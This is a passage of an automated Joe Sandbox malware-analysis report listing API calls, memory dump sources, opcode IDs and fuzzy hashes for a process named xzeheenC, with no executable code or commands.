                                                                                                                        Total number of Nodes:837
                                                                                                                        Total number of Limit Nodes:53

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        APIs
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                        • API String ID: 1430744539-2962942730
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: N
                                                                                                                        • API String ID: 0-1130791706

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq$PH]q$PH]q
                                                                                                                        • API String ID: 0-511712173
                                                                                                                        • Opcode ID: dc323609cae17c8eef28f12fb62bb683c74cc63290eb50aa650b596b30723017
                                                                                                                        • Instruction ID: 28ef7c9e7042d4645a96b1b8beed982d6a6d88387d9856a5227b37a301d2cf94
                                                                                                                        • Opcode Fuzzy Hash: dc323609cae17c8eef28f12fb62bb683c74cc63290eb50aa650b596b30723017
                                                                                                                        • Instruction Fuzzy Hash: 0C919575E012288FDB68DF69C994B9DBBB2BF89200F1081EAD90DA7355DB305E85CF11
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4bf9b159dc0a53f00403f86e46917e07da34d863bc69f457f8f9e94af9fcac5c
                                                                                                                        • Instruction ID: e838cb1f89e4447f01020752a026af3086d51e90c552dd227375b73c1af13871
                                                                                                                        • Opcode Fuzzy Hash: 4bf9b159dc0a53f00403f86e46917e07da34d863bc69f457f8f9e94af9fcac5c
                                                                                                                        • Instruction Fuzzy Hash: E133D531C146198EDB11EFA8C854ADDFBB1FF99300F50D69AE45867221EB70AAD4CF81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f6c39637dafb5566065cbe239e37b5c5e6e0543c77f95f2e069560cab90769b
                                                                                                                        • Instruction ID: 1814f49e72daf03c39f7b864008d7603f4fa4eed10f63aa011d7f25c4ce114aa
                                                                                                                        • Opcode Fuzzy Hash: 2f6c39637dafb5566065cbe239e37b5c5e6e0543c77f95f2e069560cab90769b
                                                                                                                        • Instruction Fuzzy Hash: 3002D475E01218CFDB54CFA9D884B9DBBB2BF48304F51C1A9D809AB356DB34AA85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 33d193a92083fccf44e1e66662e7ca9ba7dd95885f631016e9a4241b9743c4fe
                                                                                                                        • Instruction ID: 8305a2456752e6592d9e7ecd7fac8d0d89264d5f1f6aead00f8f590e1aee9980
                                                                                                                        • Opcode Fuzzy Hash: 33d193a92083fccf44e1e66662e7ca9ba7dd95885f631016e9a4241b9743c4fe
                                                                                                                        • Instruction Fuzzy Hash: 4E926C74E012298FDB64DF69CD98B9DBBB2BF89300F1081E9944DA7261DB346E81CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e58792f7e16d6cf8ea49a3e15125078ca51cfa42947e057521fbdd9bf84d0099
                                                                                                                        • Instruction ID: d01cf8bf0564ccbfa3f36447e68917f31da0d3c85c1dba4f246c84778a4971b9
                                                                                                                        • Opcode Fuzzy Hash: e58792f7e16d6cf8ea49a3e15125078ca51cfa42947e057521fbdd9bf84d0099
                                                                                                                        • Instruction Fuzzy Hash: 8A826A74E012298FDB65DF69CD94BDABBB2BF88300F1081E9944DA7261DB316E81CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5ceabb8ac8d083878f15646c2bd81ee757156a7794c49b86699f39df7e678029
                                                                                                                        • Instruction ID: 1b78731166ebe1dabe43281ef7401bac382090d636337b46281573b7341ef9df
                                                                                                                        • Opcode Fuzzy Hash: 5ceabb8ac8d083878f15646c2bd81ee757156a7794c49b86699f39df7e678029
                                                                                                                        • Instruction Fuzzy Hash: 2B826A74E012298FDB64DF69CD94BDEBBB2AF89300F1081E9944DA7261DB346E81CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bd41c37c84da1d9154910d2dd8127dd471144730dee90536cda1190c4ba96c42
                                                                                                                        • Instruction ID: b30c9231e9ba8417c38971f16c8ebaa3519a0b4221fdbf65767bd3874c76061f
                                                                                                                        • Opcode Fuzzy Hash: bd41c37c84da1d9154910d2dd8127dd471144730dee90536cda1190c4ba96c42
                                                                                                                        • Instruction Fuzzy Hash: 14F1AC75E01228CFDB64DFA9C984B9DBBB2BF88300F5081AAD409A7291DB355E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 93bfd935484bc1dec1086276cc23283d0db145afab573aa980dce19304cc36e9
                                                                                                                        • Instruction ID: 5f3c16c249165613241c5a52656098df0b8b6ccf4ec3e788eea72252d5273f52
                                                                                                                        • Opcode Fuzzy Hash: 93bfd935484bc1dec1086276cc23283d0db145afab573aa980dce19304cc36e9
                                                                                                                        • Instruction Fuzzy Hash: F0F1ACB5E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7351DB345E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a8a8e149c7b43b257cfdabc472740b11607bd72a9a7858d1ce687393b949b512
                                                                                                                        • Instruction ID: dcc5a44d7b461542d90486fe0584d9bdd790de7a213bf05ce8c2ebcfddc639fd
                                                                                                                        • Opcode Fuzzy Hash: a8a8e149c7b43b257cfdabc472740b11607bd72a9a7858d1ce687393b949b512
                                                                                                                        • Instruction Fuzzy Hash: DDF1AC75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7395DB345E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e1811aaf9e8410346428a469182cfad584405d42bcf3c8139de7fe90a192d510
                                                                                                                        • Instruction ID: 63bda66d9324380a23f9e105d7fb191f65c13cf1259d3bd7c50d6c787a74f5d6
                                                                                                                        • Opcode Fuzzy Hash: e1811aaf9e8410346428a469182cfad584405d42bcf3c8139de7fe90a192d510
                                                                                                                        • Instruction Fuzzy Hash: 90F19C75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5e681567c894d6e37b6d62b5368625fc60582bcc9eab162183982045abcc051a
                                                                                                                        • Instruction ID: e473d5a1c4f388f2694cc6bb5667de98797be7a60556b7fcaaa96ff5c3621cc9
                                                                                                                        • Opcode Fuzzy Hash: 5e681567c894d6e37b6d62b5368625fc60582bcc9eab162183982045abcc051a
                                                                                                                        • Instruction Fuzzy Hash: C9F1AB75E01228CFDB64DFA9C984B9DBBB2BF89300F5081AAD409A7391DB345E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 112a6ac3ae1890a080dc93551412978c78342cc348c9437e8f3fb0f511cf0f9b
                                                                                                                        • Instruction ID: ffe042fdc418a9eb7e8b083a3c31c55e957a3a01919561336e3a266de80b1852
                                                                                                                        • Opcode Fuzzy Hash: 112a6ac3ae1890a080dc93551412978c78342cc348c9437e8f3fb0f511cf0f9b
                                                                                                                        • Instruction Fuzzy Hash: 9DF1AC75E01228CFDB64DFA9C984B9DBBB2BF89300F1081AAD409A7391DB355E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 106740ca08a8ae17dc4e3f72a42301cb0644a1d3224f8a31add9a8960d34f4b7
                                                                                                                        • Instruction ID: 75d442850c38126f19d70a62816c36b43dcfd119140d5b68f36fb3a46feefd91
                                                                                                                        • Opcode Fuzzy Hash: 106740ca08a8ae17dc4e3f72a42301cb0644a1d3224f8a31add9a8960d34f4b7
                                                                                                                        • Instruction Fuzzy Hash: 50F1AC75E01228CFDB64DFA9C994B9DBBB2BF89300F5081AAD409A7291DB345E85CF50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 769c088805af8c1f471eee801f3c07c71e1694137837d248183e82b38fdaff34
                                                                                                                        • Instruction ID: 141e46f08a1cafd6a5e5a017597e661b5bc2a9da85bb98a3ca5123a224dd9d33
                                                                                                                        • Opcode Fuzzy Hash: 769c088805af8c1f471eee801f3c07c71e1694137837d248183e82b38fdaff34
                                                                                                                        • Instruction Fuzzy Hash: 9BA11771D016598EDB10DFA9C884BEDFBB1FF89300F50C6AAE41867261EB709A84CF41
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7d9ec512b9913208dc948e944788f535ef0dc4d7f5e9f6d51a7a02676e1b39c8
                                                                                                                        • Instruction ID: 0a7e3c7da7c7c74269c966b675b89345ad1fabe685ff7a8bd52c6f1761502cd8
                                                                                                                        • Opcode Fuzzy Hash: 7d9ec512b9913208dc948e944788f535ef0dc4d7f5e9f6d51a7a02676e1b39c8
                                                                                                                        • Instruction Fuzzy Hash: F7B1B275E01228CFEB64CF6AC944BDEBBF2BB89300F14C1A9D449A7254DB345A85CF11
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8789f6e51adcfd7bedad8373063c07848576420355b1a7fce88f3e31919f60aa
                                                                                                                        • Instruction ID: bf3938b27fd32ef6e8a80b7867633f34c2733bec0d0a5562031b96a9304b3429
                                                                                                                        • Opcode Fuzzy Hash: 8789f6e51adcfd7bedad8373063c07848576420355b1a7fce88f3e31919f60aa
                                                                                                                        • Instruction Fuzzy Hash: 9FB1B375E01228CFDB68CF6AC984B9EBBF2BB89300F10C1A9D408A7255DB345A81CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 59439a07dab60d55b54b6b73ce67108349ca6c09016e421db2594128b50e8b5b
                                                                                                                        • Instruction ID: 46238931c29ba5ce13fbb0a7067a5138cbab250f0ff45fe6d002b7302ea87dc8
                                                                                                                        • Opcode Fuzzy Hash: 59439a07dab60d55b54b6b73ce67108349ca6c09016e421db2594128b50e8b5b
                                                                                                                        • Instruction Fuzzy Hash: 5EB1A375E01228CFDB68CFAAC944B9DBBF2BB89300F54C1A9D408A7254DB745A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b67445a3468dc39f109248ae705d07bd752081c6b650a3a81e6348f12a30fbf0
                                                                                                                        • Instruction ID: 60704a2bc778b958c0e483f000df3e91e92581e9701844e0f6159a6bd41c050d
                                                                                                                        • Opcode Fuzzy Hash: b67445a3468dc39f109248ae705d07bd752081c6b650a3a81e6348f12a30fbf0
                                                                                                                        • Instruction Fuzzy Hash: E5B1A075E01228CFEB64CF6AC984BDEBBF2BB89300F50C0A9D449A7255DB745A85CF11
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d4c83c1843a20dd899eeb880991e1843e60490485a580c81efad9d6542f39b70
                                                                                                                        • Instruction ID: d20118864ce3299dc97c31b8c5e9a88f44c67049a4f629a54cd4f685b6c2f36a
                                                                                                                        • Opcode Fuzzy Hash: d4c83c1843a20dd899eeb880991e1843e60490485a580c81efad9d6542f39b70
                                                                                                                        • Instruction Fuzzy Hash: 8FA1B075E012288FEB64CF6AC984B9EFBF2BB89300F50C0A9D448A7255DB745A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: da996208d8931af8c31964d5172b740ac132b34b344c7f6827a062621189808f
                                                                                                                        • Instruction ID: 1066d9ee97b00165162f0ad66909a6c5fe2a2150037d4e9b926c400f9d68d557
                                                                                                                        • Opcode Fuzzy Hash: da996208d8931af8c31964d5172b740ac132b34b344c7f6827a062621189808f
                                                                                                                        • Instruction Fuzzy Hash: 55A1A275E01228CFEB64CF6AC984BDEBBF2BB89300F50C1A9D448A7254DB745A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a66defc7fd3d1e37a5891f017063ebe404fdb4937a96a89803b428a862aa86fd
                                                                                                                        • Instruction ID: 32405230cf740c13e89efd1a169892f09c7d99f61f0fdda7ba9350f8e6f74418
                                                                                                                        • Opcode Fuzzy Hash: a66defc7fd3d1e37a5891f017063ebe404fdb4937a96a89803b428a862aa86fd
                                                                                                                        • Instruction Fuzzy Hash: 9FA11470D01218CFEB10DFA9C994BDDBBB1FF89314F208269E409A72A2DB759984CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b21879e54b0bdc2d8952613c5b1a494d6316e98da9758be42adc4456239dba7
                                                                                                                        • Instruction ID: de40a368eb5ca369abca04c59115535fadff778a5c3ee502dcc8b4523c0fda19
                                                                                                                        • Opcode Fuzzy Hash: 1b21879e54b0bdc2d8952613c5b1a494d6316e98da9758be42adc4456239dba7
                                                                                                                        • Instruction Fuzzy Hash: 7A81B375E01628CFEB18CF6AC944BDEBAF2BF89300F14C1AAD448A7254DB744A85CF51

                                                                                                                        Control-flow Graph

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8bq$Haq$Haq$Haq$TJbq
                                                                                                                        • API String ID: 0-1597716666
                                                                                                                        • Opcode ID: e2ed0d0424745823e72c32ac438b5b4484d9c80f32e9f9ea4e59d3b391b3a443
                                                                                                                        • Instruction ID: b257eed1a137397a6ad36eba635f66e2d92e6e3f4741be341c8d573605dfe5c1
                                                                                                                        • Opcode Fuzzy Hash: e2ed0d0424745823e72c32ac438b5b4484d9c80f32e9f9ea4e59d3b391b3a443
                                                                                                                        • Instruction Fuzzy Hash: 68D1E774B042048FC704DFA8D590AAE7BBAFF89320F644469D505DB3A2CB75ED46CBA1
                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                        • GetLastError.KERNEL32 ref: 00401940
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3322701435-0
                                                                                                                        • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                        • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                        • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                        • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC916
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 20CAC953
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC990
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 20CAC9E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: c68818f451b92212ad4996e61869785cebf14d92bcf1baada82a51f40a012ab9
                                                                                                                        • Instruction ID: 8e7cd390abe62b21e0fba9f7fb13365135caf6f5863c35b7e8d425764c38e0d4
                                                                                                                        • Opcode Fuzzy Hash: c68818f451b92212ad4996e61869785cebf14d92bcf1baada82a51f40a012ab9
                                                                                                                        • Instruction Fuzzy Hash: 0A5185B09003498FCB04DFA9D588BEEBBF5AF88310F248059E459A7260D7756980CF65

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC916
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 20CAC953
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 20CAC990
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 20CAC9E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040AF80
                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                          • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
